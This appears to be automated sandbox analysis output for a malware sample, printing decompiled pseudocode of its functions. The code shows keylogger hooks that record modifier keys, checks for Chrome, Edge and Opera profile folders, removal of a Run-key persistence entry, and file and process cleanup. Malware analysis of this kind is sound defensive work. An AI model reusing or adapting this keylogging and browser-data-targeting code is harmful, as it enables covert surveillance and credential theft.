                    0x0040af42
                    0x00000000

                    APIs
                      • Part of subcall function 0040AFD9: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040AFE7
                      • Part of subcall function 0040AFD9: wsprintfW.USER32 ref: 0040B068
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    • CloseHandle.KERNEL32(?), ref: 0040AF29
                    • UnhookWindowsHookEx.USER32 ref: 0040AF3C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                    • String ID: Online Keylogger Stopped
                    • API String ID: 1623830855-1496645233
                    • Opcode ID: 6f22d40025a1bfc1e3de44b2905ea0c7d306e4baecb132cf5e4cc01c833ce07e
                    • Instruction ID: 5c377b32f2ef53669d55ad1889271642ed586a2817513beee3828e4679e54568
                    • Opcode Fuzzy Hash: 6f22d40025a1bfc1e3de44b2905ea0c7d306e4baecb132cf5e4cc01c833ce07e
                    • Instruction Fuzzy Hash: B601F530A043019BC721B77AC80B3BE7BB15B42305F4000BFE542225D2EBB95866C7DB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040C338(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				void* __ebp;
                    				int _t10;
                    				void* _t22;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t25 = __edi;
                    				_t24 = __edx;
                    				_t16 = __ebx;
                    				_t26 = __ecx;
                    				E0040417E(__ebx,  &_v28, __edx, _t27, E0043BA8F(__ebx, __ecx, __eflags, L"UserProfile"));
                    				L00408F79(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Google\\Chrome\\");
                    				_t10 = PathFileExistsW(E00401F04( &_v28));
                    				_t22 = _t26;
                    				_t29 = _t10;
                    				if(_t10 == 0) {
                    					E0040417E(_t16, _t22, _t24, _t27, 0x46b928);
                    				} else {
                    					E00403262(_t16, _t22, _t27, _t29,  &_v28);
                    				}
                    				E00401F09();
                    				return _t26;
                    			}










                    0x0040c338
                    0x0040c338
                    0x0040c338
                    0x0040c344
                    0x0040c350
                    0x0040c35d
                    0x0040c36b
                    0x0040c371
                    0x0040c373
                    0x0040c375
                    0x0040c387
                    0x0040c377
                    0x0040c37b
                    0x0040c37b
                    0x0040c38f
                    0x0040c39a

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040C478), ref: 0040C36B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                    • API String ID: 1174141254-4188645398
                    • Opcode ID: 0b9e0347e89692604e6418c37c0d79960e1dc7a8460537ac165cf42487d0c0e4
                    • Instruction ID: 5528a446967b69a94f6ac85f1d5bab03298bc5e4ceaa863a70715df344a6aad3
                    • Opcode Fuzzy Hash: 0b9e0347e89692604e6418c37c0d79960e1dc7a8460537ac165cf42487d0c0e4
                    • Instruction Fuzzy Hash: 7FF05E30A0031A96CB04FBB69887DBF7B2C9D10705B00017FBA01B61D2EF7D9945C2E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040C3FE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				void* __ebp;
                    				int _t10;
                    				void* _t22;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t25 = __edi;
                    				_t24 = __edx;
                    				_t16 = __ebx;
                    				_t26 = __ecx;
                    				E0040417E(__ebx,  &_v28, __edx, _t27, E0043BA8F(__ebx, __ecx, __eflags, L"AppData"));
                    				L00408F79(__ebx,  &_v28, _t25, _t27, L"\\Opera Software\\Opera Stable\\");
                    				_t10 = PathFileExistsW(E00401F04( &_v28));
                    				_t22 = _t26;
                    				_t29 = _t10;
                    				if(_t10 == 0) {
                    					E0040417E(_t16, _t22, _t24, _t27, 0x46b928);
                    				} else {
                    					E00403262(_t16, _t22, _t27, _t29,  &_v28);
                    				}
                    				E00401F09();
                    				return _t26;
                    			}










                    0x0040c3fe
                    0x0040c3fe
                    0x0040c3fe
                    0x0040c40a
                    0x0040c416
                    0x0040c423
                    0x0040c431
                    0x0040c437
                    0x0040c439
                    0x0040c43b
                    0x0040c44d
                    0x0040c43d
                    0x0040c441
                    0x0040c441
                    0x0040c455
                    0x0040c460

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040C5A4), ref: 0040C431
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: AppData$\Opera Software\Opera Stable\
                    • API String ID: 1174141254-1629609700
                    • Opcode ID: cf156a6ecf8ee96dee5900a27585634c3a36730ae867c731f30c2956d684654a
                    • Instruction ID: bb951b600aefd5fb2065524d3427c2747c4396db3e2d268b4fbe104731c0db74
                    • Opcode Fuzzy Hash: cf156a6ecf8ee96dee5900a27585634c3a36730ae867c731f30c2956d684654a
                    • Instruction Fuzzy Hash: 50F05E30A0031A96C614BBB68857CFE7B2CAD10709B50057FB601B21D2EF7C984682D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040C39B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                    				char _v28;
                    				void* __ebp;
                    				int _t10;
                    				void* _t22;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t25 = __edi;
                    				_t24 = __edx;
                    				_t16 = __ebx;
                    				_t26 = __ecx;
                    				E0040417E(__ebx,  &_v28, __edx, _t27, E0043BA8F(__ebx, __ecx, __eflags, L"UserProfile"));
                    				L00408F79(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Microsoft\\Edge\\");
                    				_t10 = PathFileExistsW(E00401F04( &_v28));
                    				_t22 = _t26;
                    				_t29 = _t10;
                    				if(_t10 == 0) {
                    					E0040417E(_t16, _t22, _t24, _t27, 0x46b928);
                    				} else {
                    					E00403262(_t16, _t22, _t27, _t29,  &_v28);
                    				}
                    				E00401F09();
                    				return _t26;
                    			}










                    0x0040c39b
                    0x0040c39b
                    0x0040c39b
                    0x0040c3a7
                    0x0040c3b3
                    0x0040c3c0
                    0x0040c3ce
                    0x0040c3d4
                    0x0040c3d6
                    0x0040c3d8
                    0x0040c3ea
                    0x0040c3da
                    0x0040c3de
                    0x0040c3de
                    0x0040c3f2
                    0x0040c3fd

                    APIs
                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040C541), ref: 0040C3CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                    • API String ID: 1174141254-2800177040
                    • Opcode ID: e5876eb193435cd500b05993bd558e27f9f6a1a3a69af8f51349df9ec48b83c7
                    • Instruction ID: 9922d2c8336b3a1773cceec301527b28c94ea2cd2d4f088de09789488757a32d
                    • Opcode Fuzzy Hash: e5876eb193435cd500b05993bd558e27f9f6a1a3a69af8f51349df9ec48b83c7
                    • Instruction Fuzzy Hash: 0CF05E30A0031A96CA04FBB6C887CBE7B2C9D1070AB00017FBA01B61D2EF7C9845C2D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E0040B4BB(void* __ebx, void* __ecx, void* __edx) {
                    				void* _t4;
                    				void* _t7;
                    				void* _t10;
                    				signed int _t12;
                    				void* _t13;
                    				void* _t17;
                    				void* _t18;
                    				void* _t19;
                    				void* _t20;
                    
                    				_t17 = __edx;
                    				_t10 = __ebx;
                    				_t18 = __ecx;
                    				_t12 = GetKeyState(0x11) & 0x0000ffff;
                    				_t4 =  *((intOrPtr*)(_t18 + 0x54)) - 0xa4;
                    				if(_t4 == 0) {
                    					_t13 = _t20 - 0x18;
                    					_push("[AltL]");
                    					L6:
                    					E00402093(_t10, _t13, _t17, _t19);
                    					return E0040A486(_t18);
                    				}
                    				_t7 = _t4 - 1;
                    				if(_t7 == 0) {
                    					if(_t12 == 0) {
                    						_t13 = _t20 - 0x18;
                    						_push("[AltR]");
                    						goto L6;
                    					}
                    					return _t7;
                    				} else {
                    					E0040A307(_t18, _t20 - 0x18);
                    					return E0040A4AB(_t18);
                    				}
                    			}












                    0x0040b4bb
                    0x0040b4bb
                    0x0040b4be
                    0x0040b4c6
                    0x0040b4cc
                    0x0040b4d1
                    0x0040b500
                    0x0040b502
                    0x0040b507
                    0x0040b507
                    0x00000000
                    0x0040b50e
                    0x0040b4d3
                    0x0040b4d6
                    0x0040b4ef
                    0x0040b4f4
                    0x0040b4f6
                    0x00000000
                    0x0040b4f6
                    0x0040b514
                    0x0040b4d8
                    0x0040b4de
                    0x0040b4eb
                    0x0040b4eb

                    APIs
                    • GetKeyState.USER32(00000011), ref: 0040B4C0
                      • Part of subcall function 0040A307: GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040A33B
                      • Part of subcall function 0040A307: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A346
                      • Part of subcall function 0040A307: GetKeyboardLayout.USER32 ref: 0040A34D
                      • Part of subcall function 0040A307: GetKeyState.USER32(00000010), ref: 0040A357
                      • Part of subcall function 0040A307: GetKeyboardState.USER32(?), ref: 0040A364
                      • Part of subcall function 0040A307: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A380
                      • Part of subcall function 0040A4AB: SetEvent.KERNEL32(?,?,00000000,0040B07F,00000000), ref: 0040A4D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                    • String ID: [AltL]$[AltR]
                    • API String ID: 3195419117-2658077756
                    • Opcode ID: b6dc9774a0a8ec5a2adb838bf2d7347d02403091b10f8b1f4a6e953bb2b07bd8
                    • Instruction ID: 9b57c0e7cc8ed76f4763050fbdd9e5a76907c93177c101b6e049ceb614ebd12e
                    • Opcode Fuzzy Hash: b6dc9774a0a8ec5a2adb838bf2d7347d02403091b10f8b1f4a6e953bb2b07bd8
                    • Instruction Fuzzy Hash: 18E0652170061417C868363E6D2E66E2911CB81B68F40056FF8426B7C7DEBD5D1542CF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0040B515(void* __ebx, void* __ecx) {
                    				void* _t4;
                    				void* _t7;
                    				signed int _t9;
                    				void* _t10;
                    				void* _t12;
                    				void* _t13;
                    				void* _t14;
                    				void* _t15;
                    
                    				_t7 = __ebx;
                    				_t13 = __ecx;
                    				_t9 = GetKeyState(0x12) & 0x0000ffff;
                    				_t4 =  *((intOrPtr*)(_t13 + 0x54)) - 0xa2;
                    				if(_t4 == 0) {
                    					if(_t9 == 0) {
                    						_t10 = _t15 - 0x18;
                    						_push("[CtrlL]");
                    						goto L5;
                    					}
                    				} else {
                    					_t4 = _t4 - 1;
                    					if(_t4 == 0) {
                    						_t10 = _t15 - 0x18;
                    						_push("[CtrlR]");
                    						L5:
                    						E00402093(_t7, _t10, _t12, _t14);
                    						return E0040A486(_t13);
                    					}
                    				}
                    				return _t4;
                    			}











                    0x0040b515
                    0x0040b518
                    0x0040b520
                    0x0040b526
                    0x0040b52b
                    0x0040b541
                    0x0040b546
                    0x0040b548
                    0x00000000
                    0x0040b548
                    0x0040b52d
                    0x0040b52d
                    0x0040b530
                    0x0040b535
                    0x0040b537
                    0x0040b54d
                    0x0040b54d
                    0x00000000
                    0x0040b554
                    0x0040b530
                    0x0040b55a

                    APIs
                    • GetKeyState.USER32(00000012), ref: 0040B51A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: State
                    • String ID: [CtrlL]$[CtrlR]
                    • API String ID: 1649606143-2446555240
                    • Opcode ID: e24d41482df51eaf985fba41dce303c7131f8f6e96d54a936b4ff406705c96e2
                    • Instruction ID: 0f8ba098aaec0a3859a6e656600ebb2f4e0011b17a59925b93d2f90cd313bedc
                    • Opcode Fuzzy Hash: e24d41482df51eaf985fba41dce303c7131f8f6e96d54a936b4ff406705c96e2
                    • Instruction Fuzzy Hash: 46E04F21600320A7C924363D5E2B76D2A50CB4176DF4041BFF9826B6C6EAAE891403DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E004135D1(void* __ecx, short* __edx, short* _a4) {
                    				void* _v8;
                    				signed int _t6;
                    
                    				_push(__ecx);
                    				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
                    					_t6 = RegDeleteValueW(_v8, _a4);
                    					asm("sbb al, al");
                    					return  ~_t6 + 1;
                    				}
                    				return 0;
                    			}





                    0x004135d4
                    0x004135e7
                    0x004135f3
                    0x004135fb
                    0x00000000
                    0x004135fd
                    0x00000000

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040CF4D,00000000,004742C0,004742D8,?,pth_unenc), ref: 004135DF
                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 004135F3
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 004135DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteOpenValue
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                    • API String ID: 2654517830-1051519024
                    • Opcode ID: 5780773755bfd2b7f1d014925d50af4b40866aca41aa9ad19db4ade421471603
                    • Instruction ID: 32204cf86de333916fc829aa5f7a4f72a4acb94c58b90522830c69a02b9a21a3
                    • Opcode Fuzzy Hash: 5780773755bfd2b7f1d014925d50af4b40866aca41aa9ad19db4ade421471603
                    • Instruction Fuzzy Hash: 23E0C231244208BFDF104F71DC07FFA776CDB01F02F1042A9B905A2091CE26CB189674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040B6DE(void* __ecx) {
                    				signed int _t12;
                    				signed int _t13;
                    				void* _t19;
                    
                    				_t19 = __ecx;
                    				_t1 = _t19 + 0x68; // 0x474140
                    				_t13 = _t12 & 0xffffff00 | DeleteFileW(E00401F04(_t1)) != 0x00000000;
                    				if(E004076DE(DeleteFileW(E00401F04(_t1))) != 0) {
                    					_t5 = _t19 + 0x80; // 0x474158
                    					RemoveDirectoryW(E00401F04(_t5));
                    				}
                    				return _t13;
                    			}






                    0x0040b6e0
                    0x0040b6e2
                    0x0040b6fe
                    0x0040b708
                    0x0040b70a
                    0x0040b716
                    0x0040b716
                    0x0040b720

                    APIs
                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B6EB
                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B716
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteDirectoryFileRemove
                    • String ID: pth_unenc
                    • API String ID: 3325800564-4028850238
                    • Opcode ID: 3b04d4cceb472a05845e6f20510e176348adf2a07eadcf8f3691fc12f3bdc4b0
                    • Instruction ID: 311552c6c657ff5eea3cfc65ad912eba5197e0b5f2ccbef396f7f3738688e0af
                    • Opcode Fuzzy Hash: 3b04d4cceb472a05845e6f20510e176348adf2a07eadcf8f3691fc12f3bdc4b0
                    • Instruction Fuzzy Hash: 8DE04671454A114BCB15AB369C44AD63398AF0031AF00486FA592E32A1EF39A809C698
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00412659() {
                    				int _t3;
                    				signed int _t6;
                    
                    				 *0x471d4b = 0;
                    				_t3 = TerminateProcess( *0x471d64, 0);
                    				WaitForSingleObject( *0x471d64, 0xffffffff);
                    				return _t6 & 0xffffff00 | _t3 != 0x00000000;
                    			}





                    0x00412662
                    0x00412669
                    0x0041267c
                    0x00412685

                    APIs
                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F6D1), ref: 00412669
                    • WaitForSingleObject.KERNEL32(000000FF), ref: 0041267C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ObjectProcessSingleTerminateWait
                    • String ID: pth_unenc
                    • API String ID: 1872346434-4028850238
                    • Opcode ID: 4b01022a9fe4a2786d7e1a29bcc3c1676ba533678c5335d1b8aa2a13a1495b4c
                    • Instruction ID: ee16894aa49bb0d8cf3b89459f4a63658b9fb99a57d9b9f42982d1fe634561be
                    • Opcode Fuzzy Hash: 4b01022a9fe4a2786d7e1a29bcc3c1676ba533678c5335d1b8aa2a13a1495b4c
                    • Instruction Fuzzy Hash: 72D01234149711AFD7310B68ED0CB943FA8A715362F14026AF928612F1CF259494AE5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0044ED1A() {
                    
                    				 *0x471a50 = GetCommandLineA();
                    				 *0x471a54 = GetCommandLineW();
                    				return 1;
                    			}



                    0x0044ed20
                    0x0044ed2b
                    0x0044ed32

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CommandLine
                    • String ID: 3z
                    • API String ID: 3253501508-2693425550
                    • Opcode ID: 51bb8462a2e9c5ee5e142f03616e2ccdb18e8138dccfcf73ce7fdb4d14d312d0
                    • Instruction ID: e0afb2da1f80415f5ff4eb5e9bf427e499c0b06233cfd307b8f97d60f86bb4c4
                    • Opcode Fuzzy Hash: 51bb8462a2e9c5ee5e142f03616e2ccdb18e8138dccfcf73ce7fdb4d14d312d0
                    • Instruction Fuzzy Hash: 1CB002788077409FC7409F78BA1D2453BA0B6586533902579D81BE7B31EF398086DF18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00440671(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                    				char* _v8;
                    				int _v12;
                    				char _v16;
                    				char _v24;
                    				char _v28;
                    				void* __ebx;
                    				char _t34;
                    				int _t35;
                    				int _t38;
                    				long _t39;
                    				char* _t42;
                    				int _t44;
                    				int _t47;
                    				int _t53;
                    				intOrPtr _t55;
                    				void* _t56;
                    				char* _t57;
                    				char* _t62;
                    				char* _t63;
                    				void* _t64;
                    				int _t65;
                    				short* _t67;
                    				short* _t68;
                    				int _t69;
                    				intOrPtr* _t70;
                    
                    				_t64 = __edx;
                    				_t53 = _a12;
                    				_t67 = _a4;
                    				_t68 = 0;
                    				if(_t67 == 0) {
                    					L3:
                    					if(_a8 != _t68) {
                    						E0043A1C7(_t53,  &_v28, _t64, _a16);
                    						_t34 = _v24;
                    						__eflags = _t67;
                    						if(_t67 == 0) {
                    							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    								_t69 = _t68 | 0xffffffff;
                    								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                    								__eflags = _t35;
                    								if(_t35 != 0) {
                    									L29:
                    									_t28 = _t35 - 1; // -1
                    									_t69 = _t28;
                    									L30:
                    									__eflags = _v16;
                    									if(_v16 != 0) {
                    										_t55 = _v28;
                    										_t31 = _t55 + 0x350;
                    										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                    										__eflags =  *_t31;
                    									}
                    									return _t69;
                    								}
                    								 *((intOrPtr*)(E0043FFBD())) = 0x2a;
                    								goto L30;
                    							}
                    							_t70 = _a8;
                    							_t56 = _t70 + 1;
                    							do {
                    								_t38 =  *_t70;
                    								_t70 = _t70 + 1;
                    								__eflags = _t38;
                    							} while (_t38 != 0);
                    							_t69 = _t70 - _t56;
                    							goto L30;
                    						}
                    						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                    						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                    							_t69 = _t68 | 0xffffffff;
                    							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                    							__eflags = _t35;
                    							if(_t35 != 0) {
                    								goto L29;
                    							}
                    							_t39 = GetLastError();
                    							__eflags = _t39 - 0x7a;
                    							if(_t39 != 0x7a) {
                    								L21:
                    								 *((intOrPtr*)(E0043FFBD())) = 0x2a;
                    								 *_t67 = 0;
                    								goto L30;
                    							}
                    							_t42 = _a8;
                    							_t57 = _t42;
                    							_v8 = _t57;
                    							_t65 = _t53;
                    							__eflags = _t53;
                    							if(_t53 == 0) {
                    								L20:
                    								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                    								__eflags = _t44;
                    								if(_t44 != 0) {
                    									_t69 = _t44;
                    									goto L30;
                    								}
                    								goto L21;
                    							} else {
                    								goto L15;
                    							}
                    							while(1) {
                    								L15:
                    								_t45 =  *_t57;
                    								_v12 = _t65 - 1;
                    								__eflags =  *_t57;
                    								if(__eflags == 0) {
                    									break;
                    								}
                    								_t47 = E0044A61F(__eflags, _t45 & 0x000000ff,  &_v24);
                    								_t62 = _v8;
                    								__eflags = _t47;
                    								if(_t47 == 0) {
                    									L18:
                    									_t65 = _v12;
                    									_t57 = _t62 + 1;
                    									_v8 = _t57;
                    									__eflags = _t65;
                    									if(_t65 != 0) {
                    										continue;
                    									}
                    									break;
                    								}
                    								_t62 = _t62 + 1;
                    								__eflags =  *_t62;
                    								if( *_t62 == 0) {
                    									goto L21;
                    								}
                    								goto L18;
                    							}
                    							_t42 = _a8;
                    							goto L20;
                    						}
                    						__eflags = _t53;
                    						if(_t53 == 0) {
                    							goto L30;
                    						}
                    						_t63 = _a8;
                    						while(1) {
                    							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                    							__eflags =  *(_t68 + _t63);
                    							if( *(_t68 + _t63) == 0) {
                    								goto L30;
                    							}
                    							_t68 =  &(_t68[0]);
                    							_t67 =  &(_t67[1]);
                    							__eflags = _t68 - _t53;
                    							if(_t68 < _t53) {
                    								continue;
                    							}
                    							goto L30;
                    						}
                    						goto L30;
                    					}
                    					 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    					return E0043B6B0() | 0xffffffff;
                    				}
                    				if(_t53 != 0) {
                    					 *_t67 = 0;
                    					goto L3;
                    				}
                    				return 0;
                    			}




























                    0x00440671
                    0x0044067a
                    0x0044067f
                    0x00440682
                    0x00440686
                    0x00440695
                    0x00440698
                    0x004406b8
                    0x004406bd
                    0x004406c0
                    0x004406c2
                    0x00440790
                    0x00440796
                    0x004407ab
                    0x004407b7
                    0x004407bd
                    0x004407bf
                    0x004407ce
                    0x004407ce
                    0x004407ce
                    0x004407d1
                    0x004407d1
                    0x004407d5
                    0x004407d7
                    0x004407da
                    0x004407da
                    0x004407da
                    0x004407da
                    0x00000000
                    0x004407e1
                    0x004407c6
                    0x00000000
                    0x004407c6
                    0x00440798
                    0x0044079b
                    0x0044079e
                    0x0044079e
                    0x004407a0
                    0x004407a1
                    0x004407a1
                    0x004407a5
                    0x00000000
                    0x004407a5
                    0x004406c8
                    0x004406ce
                    0x004406fb
                    0x00440707
                    0x0044070d
                    0x0044070f
                    0x00000000
                    0x00000000
                    0x00440715
                    0x0044071b
                    0x0044071e
                    0x0044077a
                    0x0044077f
                    0x00440787
                    0x00000000
                    0x00440787
                    0x00440720
                    0x00440723
                    0x00440725
                    0x00440728
                    0x0044072a
                    0x0044072c
                    0x00440762
                    0x00440770
                    0x00440776
                    0x00440778
                    0x0044078c
                    0x00000000
                    0x0044078c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044072e
                    0x0044072e
                    0x0044072e
                    0x00440731
                    0x00440734
                    0x00440736
                    0x00000000
                    0x00000000
                    0x00440740
                    0x00440747
                    0x0044074a
                    0x0044074c
                    0x00440754
                    0x00440754
                    0x00440757
                    0x00440758
                    0x0044075b
                    0x0044075d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044075d
                    0x0044074e
                    0x0044074f
                    0x00440752
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00440752
                    0x0044075f
                    0x00000000
                    0x0044075f
                    0x004406d0
                    0x004406d2
                    0x00000000
                    0x00000000
                    0x004406d8
                    0x004406db
                    0x004406df
                    0x004406e2
                    0x004406e6
                    0x00000000
                    0x00000000
                    0x004406ec
                    0x004406ed
                    0x004406f0
                    0x004406f2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004406f4
                    0x00000000
                    0x004406db
                    0x0044069f
                    0x00000000
                    0x004406aa
                    0x0044068c
                    0x00440692
                    0x00000000
                    0x00440692
                    0x004407e9

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440707
                    • GetLastError.KERNEL32 ref: 00440715
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440770
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
